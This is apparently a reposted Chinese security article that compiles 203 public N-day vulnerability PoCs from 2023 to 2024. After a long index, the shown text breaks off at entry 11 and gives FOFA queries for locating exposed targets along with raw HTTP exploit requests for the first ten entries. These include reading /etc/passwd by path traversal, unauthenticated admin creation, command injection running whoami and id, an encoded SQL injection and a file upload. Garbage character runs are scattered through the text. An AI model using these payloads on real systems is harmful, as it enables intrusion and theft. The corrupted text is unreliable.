互联网公开漏洞整理202309-2024064 |3 u: q$ A1 h5 Y9 r. Z, ?4 G t
道一安全 2024-06-05 07:41 北京. {, R4 Q6 y5 c! j+ s" P9 D6 M
以下文章来源于网络安全新视界 ,作者网络安全新视界5 a6 Y/ }3 H, f2 i L
, d. D: P& _; P* Z: J8 d4 }
发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。" I' ~8 e3 W! U8 C
Y- w! c! m! j( h/ [漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
. U& s# ?7 b% u; v
. g1 W; t! Z( M5 S! I4 a) _安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。: p% Q. M& v ^! D+ l+ p
$ b; d& |7 U8 h m8 ? J. J
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。- { {1 r/ s3 y
9 Y0 _0 l7 \$ t- ^2 M3 K
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。. P* K5 F6 L+ \3 y+ m
# x B9 l5 r/ o# i
$ A% [0 A g; u, {; c* E声明2 D$ u# N: q' C+ y4 I2 m. H
l. `, T, r! W
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。. Q% T% [$ K6 P _* x9 _
3 F g: F0 ~1 h/ }有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
( w- E4 w3 o7 [$ ]
! u/ r; Z0 B- F" D( k. k# \- Q! }4 q2 Q* o
* ?% {) L* E7 R! d3 I$ r
目录
: P: Z+ V6 K5 P+ ~& P8 E
4 M9 o* I0 z) j5 y5 c01$ ^" d% D' U. ~0 n: s4 Z4 ]
) c) Q) @" A/ C) u( ?- V
1. StarRocks MPP数据库未授权访问
: N: c, f7 A! }- r. }2. Casdoor系统static任意文件读取; Q5 l& s( v7 F! S% f
3. EasyCVR智能边缘网关 userlist 信息泄漏
$ q$ a. O# ?. h% O! Q, @" {4. EasyCVR视频管理平台存在任意用户添加
- r6 ?! H" R+ p9 y1 P+ i5. NUUO NVR 视频存储管理设备远程命令执行" \ H' `! c* P! X+ @9 F
6. 深信服 NGAF 任意文件读取
8 p0 s t: l& _ ?2 Y0 [6 }4 @7. 鸿运主动安全监控云平台任意文件下载" J7 Q: Q% C, u5 v: W0 \" v
8. 斐讯 Phicomm 路由器RCE7 i& T `2 K" H
9. 稻壳CMS keyword 未授权SQL注入' I' ?3 n2 m; s" }! \
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传. T- U6 s* `5 Z2 k
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入 q2 p7 h+ S4 @8 v
12. Jorani < 1.0.2 远程命令执行
) f- z$ u# `) q. l" C13. 红帆iOffice ioFileDown任意文件读取
9 q" P! S+ | A U: ~) s14. 华夏ERP(jshERP)敏感信息泄露. r2 m3 { i) `+ l8 Z
15. 华夏ERP getAllList信息泄露( D9 ]) s3 t. _$ f
16. 红帆HFOffice医微云SQL注入5 I+ k B' u+ s, [) h$ W" e
17. 大华 DSS itcBulletin SQL 注入7 D6 N( v, f' C: b W' d
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露/ |9 S# w, P6 V
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
1 D/ M0 e4 `! [$ g20. 大华ICC智能物联综合管理平台任意文件读取% V" e; ?% \1 C2 i+ ^
21. 大华ICC智能物联综合管理平台random远程代码执行3 G' B2 W$ `1 _0 C) ?1 ~, J6 H
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
9 m1 o6 P: N# K2 u$ t* S23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* g ?" s5 |- s+ ?# d24. 用友NC 6.5 accept.jsp任意文件上传
6 r& b+ q1 ^* M, ?- v25. 用友NC registerServlet JNDI 远程代码执行
8 ^' |* E- {- a0 M; h: d' v* ]3 K26. 用友NC linkVoucher SQL注入* x, U) V" j: r% [# \
27. 用友 NC showcontent SQL注入9 D: e6 ?- x; D: n; b/ u
28. 用友NC grouptemplet 任意文件上传
9 n6 H2 n8 u0 u+ ^29. 用友NC down/bill SQL注入
0 _0 h4 V) Y5 k \4 M0 ~6 \4 i' G D( q30. 用友NC importPml SQL注入1 B, r7 u3 _9 ?+ `, d1 X$ H7 |: z
31. 用友NC runStateServlet SQL注入
5 ]# N4 N/ ?5 y5 c8 Y- b& [ H32. 用友NC complainbilldetail SQL注入
% H; u4 @ L5 V. A# z, w/ p33. 用友NC downTax/download SQL注入
! `( ~+ r1 x) A' D34. 用友NC warningDetailInfo接口SQL注入' j. \( ?8 v3 P5 b9 a; e6 h: U2 d
35. 用友NC-Cloud importhttpscer任意文件上传
: f: n9 d3 m/ K) ^% H' A" L36. 用友NC-Cloud soapFormat XXE
B' n+ ^8 Q+ ~, L( e* `37. 用友NC-Cloud IUpdateService XXE
7 C! Z2 ?7 y, T/ z7 Y8 e/ g38. 用友U8 Cloud smartweb2.RPC.d XXE
+ [" Q4 Z7 j" S4 l39. 用友U8 Cloud RegisterServlet SQL注入
( X; X( B# Y0 `) D: {" n M* I8 o0 x# {40. 用友U8-Cloud XChangeServlet XXE- ^- I3 R; i# |* r
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入# ^2 D1 G6 I4 v7 \1 p: {" K
42. 用友GRP-U8 SmartUpload01 文件上传" g* L9 `9 V' V) Q
43. 用友GRP-U8 userInfoWeb SQL注入致RCE8 \& a! ^/ \& Y O$ }) o
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
" J# j3 Y+ P+ r/ J2 `, A9 ~3 q# R45. 用友GRP-U8 ufgovbank XXE
! v0 M: p% i, I5 t46. 用友GRP-U8 sqcxIndex.jsp SQL注入
& p3 ?+ I* C8 N47. 用友GRP A++Cloud 政府财务云 任意文件读取
, `4 v& D; ?# s* | c `48. 用友U8 CRM swfupload 任意文件上传" s" E6 r+ V* G% ]
49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 J: e* O- C2 i. \ g) n
50. QDocs Smart School 6.4.1 filterRecords SQL注入
! i0 I8 l8 r' Q) ]6 }" m1 S51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
9 a$ U0 w5 Y! U) M52. 泛微E-Office json_common.php sql注入
V; i2 W6 ~: A$ X53. 迪普 DPTech VPN Service 任意文件上传
6 m* R8 t A9 Z! _( l4 F54. 畅捷通T+ getstorewarehousebystore 远程代码执行
0 @' F9 Y1 Q1 O: b55. 畅捷通T+ getdecallusers信息泄露* d0 Z+ O: d* G! n" f1 b$ s
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
5 g- k6 @. }" z57. 畅捷通T+ keyEdit.aspx SQL注入
' u7 C/ M. R. K, v58. 畅捷通T+ KeyInfoList.aspx sql注入
5 u! s* P! N' M4 F H* R59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行+ h( |! R* C9 U
60. 百卓Smart管理平台 importexport.php SQL注入" {: ^/ P7 W: L6 w9 R4 n
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传) v" k' G! f3 j2 e; d+ ~3 R
62. IP-guard WebServer 远程命令执行, X& ~* z) \4 t$ n( Y
63. IP-guard WebServer任意文件读取9 ]* [+ P% D h7 G. I" \) C+ n
64. 捷诚管理信息系统CWSFinanceCommon SQL注入1 n; }) P- N n8 m8 V X
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过. T! R( w$ C4 v9 J4 T( m+ e1 A
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
+ F+ y% x o W5 N& y67. 万户ezOFFICE wpsservlet任意文件上传
/ t' V# m8 l+ W68. 万户ezOFFICE wf_printnum.jsp SQL注入
' }9 u* o1 d- w( y$ @) |4 C: L8 K69. 万户 ezOFFICE contract_gd.jsp SQL注入
8 h3 p1 _6 E5 {! R, d70. 万户ezEIP success 命令执行9 E/ \# `/ a- y8 a! i; v
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入( k; ] O4 N9 k
72. 致远OA getAjaxDataServlet XXE
9 V# C/ N* ~/ z( P% v. i' y+ w$ p73. GeoServer wms远程代码执行7 f& Z& k5 T) e( z
74. 致远M3-server 6_1sp1 反序列化RCE2 D% j# y: C% Q. i
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE" B+ }/ }* W+ K, E, ?# t$ R
76. 新开普掌上校园服务管理平台service.action远程命令执行
/ r- v# t: |3 f: e8 f77. F22服装管理软件系统UploadHandler.ashx任意文件上传
! G( B9 I- ?* o* A78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
9 b8 s2 `+ r, G' p7 c$ }79. BYTEVALUE 百为流控路由器远程命令执行- _& u' ~: ~% c
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
( J- H" E k! `- B7 s0 ^81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露( r( `2 A2 E) z, q* Z
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行* x+ x' N- Q; h2 i# x8 W7 Z- @
83. JeecgBoot testConnection 远程命令执行, q) B$ K! M* V% l5 z5 [3 M0 ]
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入! ^4 b2 c( Z% }% |$ ~9 ]+ b4 t
85. SysAid On-premise< 23.3.36远程代码执行
* A2 U- O9 Y- n3 u# u& Q4 }. K8 q86. 日本tosei自助洗衣机RCE
& Y/ ~( R" r, h87. 安恒明御安全网关aaa_local_web_preview文件上传
W4 {8 C% t1 A0 J- | \$ t88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
9 y6 u d0 j: U) v, k89. 致远互联FE协作办公平台editflow_manager存在sql注入8 |1 f% G0 `$ Q- K4 ^! X
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行$ o2 N* v2 ?# H
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取8 v! K" m9 a# b: S0 ]8 {9 I4 |: A5 M
92. 海康威视运行管理中心session命令执行
: o7 l+ p; [7 W* z: Q D1 C93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
; S; K7 m9 E- Q% d, e Q# D1 N6 K94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
" p9 ^1 K0 g: S* n+ a95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
o" ^$ b# r0 I& ?6 `, q, d; l96. Apache OFBiz 18.12.11 groovy 远程代码执行
- `# X m0 O: C! e97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
) o* ?* Y* }* q" ~98. SpiderFlow爬虫平台远程命令执行) z3 j# f) \7 v% K4 T
99. Ncast盈可视高清智能录播系统busiFacade RCE+ N Y- E! o9 y+ ]( Q# E. }5 l) ^- Y/ C
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
7 T" Z& B7 F" }- c$ P8 d2 R101. ivanti policy secure-22.6命令注入. X/ U2 l: j' G, W% q/ Z* [
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
2 j) d% `) z5 @7 [7 b103. Ivanti Pulse Connect Secure VPN XXE3 [4 S7 H5 N* Y+ i! l
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露& }/ p- h7 U7 L
105. SpringBlade v3.2.0 export-user SQL 注入( s3 X) A% [2 c4 e1 \4 c
106. SpringBlade dict-biz/list SQL 注入/ u" K! D# `: H7 ?' H ]3 M' k
107. SpringBlade tenant/list SQL 注入
8 |: |* w1 N! \ g108. D-Tale 3.9.0 SSRF
6 e. o6 Q, W0 U" T `109. Jenkins CLI 任意文件读取
' [0 T# k8 {" |1 `# B* n110. Goanywhere MFT 未授权创建管理员5 W8 { Y8 e6 @2 [
111. WordPress Plugin HTML5 Video Player SQL注入4 U0 e% K% u9 f/ z6 t
112. WordPress Plugin NotificationX SQL 注入0 ~2 _- F. j i M0 N' U- ?7 ^
113. WordPress Automatic 插件任意文件下载和SSRF9 V+ E, Y0 `8 p! H9 J5 z' K
114. WordPress MasterStudy LMS插件 SQL注入
2 m/ s8 F( p( T. S6 y9 Z- ]: b, K115. WordPress Bricks Builder <= 1.9.6 RCE6 c, ]1 B' }. r9 w7 d9 Y" |7 A! V
116. wordpress js-support-ticket文件上传2 q) O" g9 _. }1 ]
117. WordPress LayerSlider插件SQL注入4 J) h2 G- K' W, J c8 _
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传+ i; J6 P+ W5 R7 y' L [; |
119. 北京百绰智能S20后台sysmanageajax.php sql注入: `, H* E4 |. L
120. 北京百绰智能S40管理平台导入web.php任意文件上传2 W9 A- U5 m' J+ M7 n
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
8 I+ ]1 [$ |, `! Y& ^5 @122. 北京百绰智能s200管理平台/importexport.php sql注入
- m Q0 ~' x3 ?7 |9 g7 h123. Atlassian Confluence 模板注入代码执行. c" Q) J: l, l0 ~2 w% e
124. 湖南建研工程质量检测系统任意文件上传8 P* b) a9 P5 ~# b, k
125. ConnectWise ScreenConnect身份验证绕过 H+ S( I. Z* C. O
126. Aiohttp 路径遍历' u3 [# E* B/ R! i3 s0 Q
127. 广联达Linkworks DataExchange.ashx XXE
8 u7 t* w7 n+ X1 B7 R128. Adobe ColdFusion 反序列化
5 F4 P& s2 H; b129. Adobe ColdFusion 任意文件读取- [; P# ]+ b. n- [
130. Laykefu客服系统任意文件上传) h+ G- K7 D8 h$ [
131. Mini-Tmall <=20231017 SQL注入
& E0 I }! g8 p* R# t% Y) R: Y; X132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过. T; h6 d" D+ W
133. H5 云商城 file.php 文件上传/ n; p) y+ y- {% M. `3 N
134. 网康NS-ASG应用安全网关index.php sql注入' G m; i# H; j+ r
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入* Q& o) {8 _9 S6 x5 r
136. NextChat cors SSRF
, u9 o0 ?: e6 L8 W137. 福建科立迅通信指挥调度平台down_file.php sql注入+ X3 o$ `/ X) r S6 i6 Y$ Q0 ^
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入( W# \, |( @# Y; ~
139. 福建科立讯通信指挥调度平台editemedia.php sql注入+ `& \/ |: C {5 U
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
+ t7 {& E, {5 m F- t141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
( O- T; D# H# _5 |2 q% v& Y142. CMSV6车辆监控平台系统中存在弱密码. v7 G* ?# T; H7 l8 s
143. Netis WF2780 v2.1.40144 远程命令执行3 V% q1 C! V B( z5 N Z' e1 _
144. D-Link nas_sharing.cgi 命令注入7 w* V: }$ h& \. E: q- Q5 U1 j. r
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
) |1 x9 S" X$ U4 X( T* r3 E8 U146. MajorDoMo thumb.php 未授权远程代码执行
+ j2 {3 o) C, h* H147. RaidenMAILD邮件服务器v.4.9.4-路径遍历% V' v, E& o3 e" h7 h. e
148. CrushFTP 认证绕过模板注入
t3 p, }0 D5 I5 `/ `149. AJ-Report开源数据大屏存在远程命令执行
8 s- j& S& r7 y150. AJ-Report 1.4.0 认证绕过与远程代码执行/ l7 S/ g: L- V V, Q" Y
151. AJ-Report 1.4.1 pageList sql注入3 o: v' w% k& J5 J0 l t l6 A
152. Progress Kemp LoadMaster 远程命令执行
4 t- L# u0 H9 e' X6 B% N3 \+ w% ~153. gradio任意文件读取
$ x4 r% D, {/ X* }4 H- E154. 天维尔消防救援作战调度平台 SQL注入' ^7 e4 j& M* @7 I+ k& d
155. 六零导航页 file.php 任意文件上传
2 u/ }0 C2 z% Q2 }156. TBK DVR-4104/DVR-4216 操作系统命令注入
( ~( W' B; a8 }$ b3 |157. 美特CRM upload.jsp 任意文件上传
. R) V! k, E4 p; v0 U* Y158. Mura-CMS-processAsyncObject存在SQL注入
; P( ], W+ u' G159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传% i1 ]6 ]0 G* c; [8 V+ o
160. Sonatype Nexus Repository 3目录遍历与文件读取7 O" R1 r. m% p1 e) v Q9 G* g/ H; r
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传3 z N" L* E. B* }1 Q: o) K) \
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传1 Y: t1 o1 ^; o2 M* r7 K& f9 X. R
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传4 L- p" P7 K6 F0 O
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
( T/ ], |9 N) X4 m, o" a3 `4 Y8 R165. OrangeHRM 3.3.3 SQL 注入
6 q: r5 c3 X( m; r166. 中成科信票务管理平台SeatMapHandler SQL注入
3 Z+ q, [) @/ R/ Q Y+ L, o6 p167. 精益价值管理系统 DownLoad.aspx任意文件读取% j) n p" I8 t4 u6 B
168. 宏景EHR OutputCode 任意文件读取# q, H/ w5 @0 ]0 E; E. m
169. 宏景EHR downlawbase SQL注入
7 q1 q" M/ m- s- w170. 宏景EHR DisplayExcelCustomReport 任意文件读取- Q$ [4 v, X6 s, B
171. 通天星CMSV6车载定位监控平台 SQL注入) l/ D3 _, P, N
172. DT-高清车牌识别摄像机任意文件读取' F) d" a; w/ E7 }
173. Check Point 安全网关任意文件读取
9 \0 I7 `. R/ x7 c4 |4 y174. 金和OA C6 FileDownLoad.aspx 任意文件读取
* Q l- W6 E7 d3 X1 J1 ?* z! q G- }175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入) S* b; L9 L+ d E2 ?0 A& g0 O& V
176. 电信网关配置管理系统 rewrite.php 文件上传- }% V, J# i6 @ m( O
177. H3C路由器敏感信息泄露
5 u, o5 d, ]* b& d178. H3C校园网自助服务系统-flexfileupload-任意文件上传
0 l" B6 }8 Z9 B( V9 }' {/ ]179. 建文工程管理系统存在任意文件读取' k. t0 m1 N, D6 S0 n/ ~, A2 _
180. 帮管客 CRM jiliyu SQL注入) R$ \1 _8 ~6 x3 ^5 V
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入$ l( ~+ K) G; `, Q8 q
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
, h& i D' d9 N7 h183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
7 n( G% n/ q2 S184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
' w' T/ P( B; M4 x; g- ^* D185. 瑞友天翼应用虚拟化系统SQL注入 O! u, G: Q# G
186. F-logic DataCube3 SQL注入. j% ^/ W E7 d, h4 ?
187. Mura CMS processAsyncObject SQL注入5 N7 f! w& K* R! i
188. 叁体-佳会视频会议 attachment 任意文件读取
3 T9 m8 j1 B7 Y189. 蓝网科技临床浏览系统 deleteStudy SQL注入
* K! B1 Q/ y+ f, C0 v190. 短视频矩阵营销系统 poihuoqu 任意文件读取
; x0 a2 X; d% e+ O1 P( M191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入+ }7 e4 M( O6 Z* O
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
1 b5 u0 b; a$ K- e193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
4 K) E. N# l* c4 Q! E# z$ F+ K194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
$ `9 ^; J" X" j, Y$ W s( u" u |2 K195. 飞鱼星上网行为管理系统 send_order.cgi命令执行6 N% [- Z K' k) \9 ?
196. 河南省风速科技统一认证平台密码重置5 G L5 K0 u. [8 O; B) ~! C2 W
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入! K: S7 `1 d: Y: V* b
198. 阿里云盘 WebDAV 命令注入
( r' O6 A( X6 }2 a* k" Y% y199. cockpit系统assetsmanager_upload接口 文件上传
$ H1 g9 O {! H+ C$ N1 ~200. SeaCMS海洋影视管理系统dmku SQL注入0 @) _: s3 @. d
201. 方正全媒体新闻采编系统 binary SQL注入" K1 O% p; S: R( |1 |0 N0 f
202. 微擎系统 AccountEdit任意文件上传
# s2 |+ i# z6 Q203. 红海云EHR PtFjk 文件上传
, H5 {9 v6 F; ~0 J' S2 G* y D+ v5 W+ c4 s2 y
POC列表1 K q K: l. D0 f" s, ?+ s3 q
8 D2 r$ i1 C& a5 y5 j- W027 W( [7 H- d! T! S1 W6 a
! d4 z: s: k8 g- A2 c9 P6 D+ t1. StarRocks MPP数据库未授权访问
: Q* q$ h( `7 S3 h( eFOFA :title="StarRocks"
0 c$ C" Q8 \0 T5 y9 z4 y1 W( bGET /mem_tracker HTTP/1.1
# t+ o3 s- K9 i" v6 o. ?Host: URL G% m0 G! b4 r5 Z2 W8 _
* R% `# n1 P$ J# c# ` m: I0 ^
$ M1 ?! i9 }/ `0 ?2 g0 e S2. Casdoor系统static任意文件读取7 C% y% p9 d3 K- H$ b# [
FOFA :title="Casdoor"
% M8 C7 _# T) ]" ^GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
- Q$ M( f+ u P) P. W4 `Host: xx.xx.xx.xx:9999) T% Y6 I3 y8 l. N; \9 `
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
4 G* H4 _3 ~0 o& M7 w; EConnection: close) x: w4 x) {7 T9 t
Accept: */*3 U& v( a- p& p) m4 e/ G1 ], f
Accept-Language: en
~, l5 x5 G/ L1 i3 _9 xAccept-Encoding: gzip
0 u6 d, i: M7 B6 [, R& d- _+ g
$ [4 j7 h$ H6 z/ m
5 i( `5 a( B9 k) Q0 E4 l3. EasyCVR智能边缘网关 userlist 信息泄漏( a {* A. H7 u+ \
FOFA :title="EasyCVR"4 O; A5 z2 T5 `! ^" A8 U5 p0 J* V V4 F
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.19 O# s* b3 V# J+ I; v* u) c0 U
Host: xx.xx.xx.xx
5 I7 [$ i. _* y h2 O4 m: N, b: J1 f# r3 i& e
6 s( T; b+ P0 e: ]) o/ Z: X
4. EasyCVR视频管理平台存在任意用户添加+ K0 l* G$ Y, C3 J+ w( ^8 I
FOFA :title="EasyCVR" b% p& K9 o5 N0 E! v3 |& q9 L
6 [* q1 W0 M; E" [: N, t q; G3 Y
password更改为自己的密码md5
7 r+ x0 G! u/ Z# S5 V% h* q6 R7 aPOST /api/v1/adduser HTTP/1.1; h6 ^+ P$ b$ w9 ~
Host: your-ip( C$ P7 v3 X/ W" Y$ u/ r* w
Content-Type: application/x-www-form-urlencoded; charset=UTF-8+ |: V- j& y! Q) K% k7 T9 D$ f
* p& H& P# M/ j7 f7 h* j
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
1 y& ^0 S& Y) { E) T' D" c( T8 M- A5 b: n- m) L- k( [9 \" o
: X& b6 H: i+ M6 [: u/ e& j
5. NUUO NVR 视频存储管理设备远程命令执行
" G+ ~/ j0 k3 v tFOFA:title="Network Video Recorder Login"
' k7 e q3 Z5 n, N% u% iGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
4 ^ d7 D" c. O3 m. [ XHost: xx.xx.xx.xx' f$ z* M/ P, j; S" H; n% E$ c+ L
/ j" y$ m) \1 O- P% _8 p( w
8 r, c2 g4 B ]" y- `, W `6. 深信服 NGAF 任意文件读取
5 f+ `3 H& E, H, |% y. c9 `4 tFOFA:title="SANGFOR | NGAF"* M D+ t. r) _
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.15 s3 D* @7 p( Z8 C2 b" j5 ]$ N) k
Host:' V$ R: n9 p4 S& ]( t: z
6 a! M# i) c R* k
3 |% @8 X# x' O0 O2 O7. 鸿运主动安全监控云平台任意文件下载
: C" S1 }$ M. ]' Y$ {; UFOFA:body="./open/webApi.html"% R2 {9 X( d4 A8 J( E: t" E) }3 ^
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
' D& K& p) i2 QHost:9 J+ e# C L7 G' Y) C N0 F
, Z( T0 S9 ?; k6 j. d9 M
& @3 C1 n, ^! W1 ]4 I8. 斐讯 Phicomm 路由器RCE+ s; q1 W- g& t ?* M0 D9 g; i9 M
FOFA:icon_hash="-1344736688"
' F" U9 }/ _, W) ^默认账号admin登录后台后,执行操作9 ?9 |2 J! f. R6 R$ @1 q
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.18 M- R( E- V0 g6 @. y& P
Host: x.x.x.x
! h+ e: H Y# H p4 Q8 f1 UCookie: sysauth=第一步登录获取的cookie
6 {; t0 i8 ^ c! Q3 s6 j) K) @( KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz6 L, ?6 [* @0 b' V+ Z" i/ y
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
0 H4 C( o( {5 G# K! L$ ~4 S
. z$ A; N* d \) A9 D+ z# \------WebKitFormBoundaryxbgjoytz5 }6 r2 a* y" S& G# V
Content-Disposition: form-data; name="wifiRebootEnablestatus"0 G. m; x' _6 I* ^2 Q% e
7 r/ b( o+ h w0 O. a7 J6 D%s$ s8 p i% Y, k2 F
------WebKitFormBoundaryxbgjoytz
( Q" ]" u* `5 {- X: Y! S7 a2 O/ n; i2 OContent-Disposition: form-data; name="wifiRebootrange"
6 Y* S: }3 f+ R; l3 T1 e+ v+ a/ }# n5 J4 V8 o9 S4 @
12:00; id;. U; e# C( n) a/ m. W, |
------WebKitFormBoundaryxbgjoytz
9 S ~) e8 j' j0 Q5 L" j4 |Content-Disposition: form-data; name="wifiRebootendrange"
" N' F" |7 a# J n) U
7 n4 B Z* G8 ^% ^%s:
( W# s2 o5 G& m9 o3 s------WebKitFormBoundaryxbgjoytz5 v0 l6 D% N8 i7 z
Content-Disposition: form-data; name="cururl2"
I+ K# E: w5 e) N, C& S5 `- h
+ e/ p. ?' S4 G, G: u3 @* s U" k- }4 w4 D! d$ s
------WebKitFormBoundaryxbgjoytz--! O/ H {( D5 y; Z5 ~! I
5 @5 y; n, c7 q$ l* |1 T0 V) K2 J: e; X# O( n/ `: i7 e
9. 稻壳CMS keyword 未授权SQL注入
% k( H- K& W, ~4 e8 q; KFOFA:app="Doccms"
# ~/ Z4 z( w0 m2 i( B& JGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.12 i7 @4 m9 A; l
Host: x.x.x.x
. T9 J# J# E; q5 P6 O' A% \
7 ~, p! ^0 R; Y- a8 t
0 G/ s$ [. s: b8 B) q- C+ ?payload为下列语句的二次Url编码
6 D' M9 w* R0 S
; D9 c V8 x p' g- R3 M0 h: ~' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
P: ^' n' M* Y/ W
1 i; h. g) Y' ^ r0 g; j0 x# C8 ]10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
) [' X: H _5 l: d2 u) ?FOFA:icon_hash="953405444"9 f, |8 ^, b3 K! ^
4 ?: O9 U$ {6 W, Q. e
文件上传后响应中包含上传文件的路径
8 \, M# w M! g t3 |' W/ dPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
% |; @7 J& F! {8 E/ zHost: x.x.x.x:xx: |. q( U6 d' Q! z/ G l0 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
6 f+ A) u8 j# b3 h% j* WContent-Length: 1975 I' Y" Z8 B* D( R' `9 N. D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
$ b3 p, |: |) U5 Q% o$ q8 fAccept-Encoding: gzip, deflate4 ~) S) D) u* G. d
Accept-Language: zh-CN,zh;q=0.9
8 h6 i8 m7 V$ x+ q: FConnection: close
5 H- |- y7 X! z! qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
. p' L: I1 s5 }7 B9 a9 _- G* B1 @; }8 m8 c
------WebKitFormBoundaryxdgaqmqu. y' x! [2 D( j9 [9 q
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
! a V$ e P3 f7 OContent-Type: text/html, q5 a# [" F6 `8 d! o
9 h( P1 y! S8 p o1 t5 o7 D
jmnqjfdsupxgfidopeixbgsxbf9 ~# G6 g+ P- v/ f' E Z
------WebKitFormBoundaryxdgaqmqu--
4 p+ }. y G0 ^4 I
/ x$ D5 e2 u0 l. j
& Y+ d* Q) d; g, c4 V11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
4 S; n. G5 r6 F3 p3 s9 G8 b8 w5 SFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"1 \- G$ P i8 e. ^
